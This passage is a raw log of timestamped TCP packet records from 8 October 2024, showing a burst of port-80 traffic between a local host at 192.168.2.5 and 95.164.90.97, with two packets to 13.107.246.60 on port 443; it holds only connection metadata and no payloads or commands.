Oct 8, 2024 20:47:24.643692017 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.643702030 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.643707037 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.643712044 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.643722057 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.643727064 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.643742085 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.643759012 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.643784046 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.643871069 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.643949032 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.643961906 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.643970966 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.643981934 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.643991947 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.643995047 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.644002914 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.644015074 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.644023895 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.644032001 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.644035101 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.644063950 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.644081116 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.644136906 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.644172907 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.644208908 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.644218922 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.644228935 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.644237995 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.644243956 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.644248009 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.644263983 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.644289970 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.644431114 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.644442081 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.644458055 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.644468069 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.644473076 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.644478083 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.644488096 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.644489050 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.644500971 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.644555092 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.644555092 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.644670010 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.644680977 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.644691944 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.644702911 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.644711018 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.644712925 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.644722939 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.644731998 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.644737005 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.644762039 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.644782066 CEST	49791	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:24.644793034 CEST	443	49791	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:24.644855976 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.644867897 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.644901037 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.645191908 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.645226955 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.645239115 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.645250082 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.645272017 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.645286083 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.645350933 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.645359993 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.645370960 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.645381927 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.645384073 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.645399094 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.645423889 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.645522118 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.645531893 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.645541906 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.645551920 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.645562887 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.645569086 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.645593882 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.645613909 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.645741940 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.645750999 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.645761967 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.645771980 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.645781040 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.645782948 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.645792961 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.645798922 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.645803928 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.645824909 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.645837069 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.645956039 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.645966053 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.645981073 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.645989895 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.645997047 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.645999908 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.646009922 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.646014929 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.646022081 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.646032095 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.646042109 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.646048069 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.646068096 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.646086931 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.646935940 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.646979094 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.646994114 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.647002935 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.647025108 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.647038937 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.647090912 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.647100925 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.647109985 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.647119999 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.647125959 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.647144079 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.647171974 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.696300030 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.696321011 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.696331024 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.696342945 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.696358919 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.696410894 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.696422100 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.696454048 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.696508884 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.696518898 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.696531057 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.696548939 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.696569920 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.696631908 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.696640015 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.696661949 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.696677923 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.696679115 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.696688890 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.696717978 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.696830988 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.696840048 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.696851015 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.696861029 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.696871042 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.696871042 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.696892977 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.696907043 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.729487896 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.729547977 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.729559898 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.729569912 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.729592085 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.729612112 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.729690075 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.729700089 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.729710102 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.729721069 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.729727030 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.729748011 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.729764938 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.729918957 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.729928970 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.729938030 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.729948997 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.729954004 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.729960918 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.729971886 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.729976892 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.729996920 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.730010986 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.730089903 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.730120897 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.730184078 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.730298996 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.730309010 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.730319023 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.730330944 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.730353117 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.730446100 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.730457067 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.730467081 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.730477095 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.730487108 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.730489016 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.730504990 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.730529070 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.730643988 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.730654001 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.730664015 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.730674982 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.730684996 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.730691910 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.730701923 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.730706930 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.730711937 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.730722904 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.730724096 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.730735064 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.730751991 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.730777979 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.731055975 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.731065989 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.731076002 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.731091022 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.731100082 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.731115103 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.731159925 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.731169939 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.731179953 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.731200933 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.731223106 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.731350899 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.731359959 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.731368065 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.731378078 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.731393099 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.731396914 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.731400967 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.731406927 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.731420994 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.731425047 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.731446981 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.731466055 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.731684923 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.731693983 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.731704950 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.731714010 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.731724024 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.731730938 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.731733084 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.731745005 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.731755018 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.731756926 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.731765032 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.731774092 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.731775045 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.731786013 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.731791019 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.731796026 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.731812000 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.731837988 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.732134104 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.732142925 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.732152939 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.732162952 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.732167959 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.732172966 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.732182980 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.732192993 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.732193947 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.732203960 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.732213974 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.732217073 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.732233047 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.732240915 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.732598066 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.732606888 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.732615948 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.732626915 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.732631922 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.732635975 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.732645988 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.732650042 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.732651949 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.732660055 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.732670069 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.732677937 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.732681036 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.732693911 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.732707977 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.732738972 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.732917070 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.732925892 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.732937098 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.732948065 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.732949018 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.732965946 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.732988119 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.733192921 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.733201981 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.733211994 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.733222008 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.733232021 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.733232021 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.733242989 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.733253002 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.733257055 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.733263969 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.733270884 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.733274937 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.733283997 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.733288050 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.733294010 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.733303070 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.733309984 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.733314037 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.733323097 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.733335018 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.733347893 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.733371019 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.733673096 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.733712912 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.733721018 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.733753920 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.733809948 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.733819962 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.733829021 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.733839989 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.733844995 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.733860016 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.733880043 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.733910084 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.733973026 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.733979940 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.733983040 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.734004021 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.734016895 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.783265114 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.783304930 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.783314943 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.783370972 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.783410072 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.783432961 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.783443928 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.783452988 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.783464909 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.783472061 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.783492088 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.783520937 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.783557892 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.783566952 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.783600092 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.783629894 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.783641100 CEST	80	49755	95.164.90.97	192.168.2.5
